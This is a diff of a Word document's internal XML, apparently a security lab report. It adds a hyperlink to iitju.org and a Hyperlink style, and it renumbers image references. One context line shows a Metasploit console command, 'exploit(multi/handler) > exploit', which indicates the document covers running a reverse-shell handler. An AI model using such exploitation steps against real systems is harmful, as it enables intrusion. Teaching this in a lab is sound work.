@@ -1422,6 +1414,32 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt; </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+          </w:rPr>
+          <w:t>https://iitju.org/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1690,8 +1708,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> exploit(multi/handler) &gt; exploit</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1796,6 +1812,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
         </w:rPr>
         <w:drawing>
@@ -1814,7 +1831,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1860,6 +1877,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -1879,7 +1897,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3009,6 +3027,17 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="003F3287"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
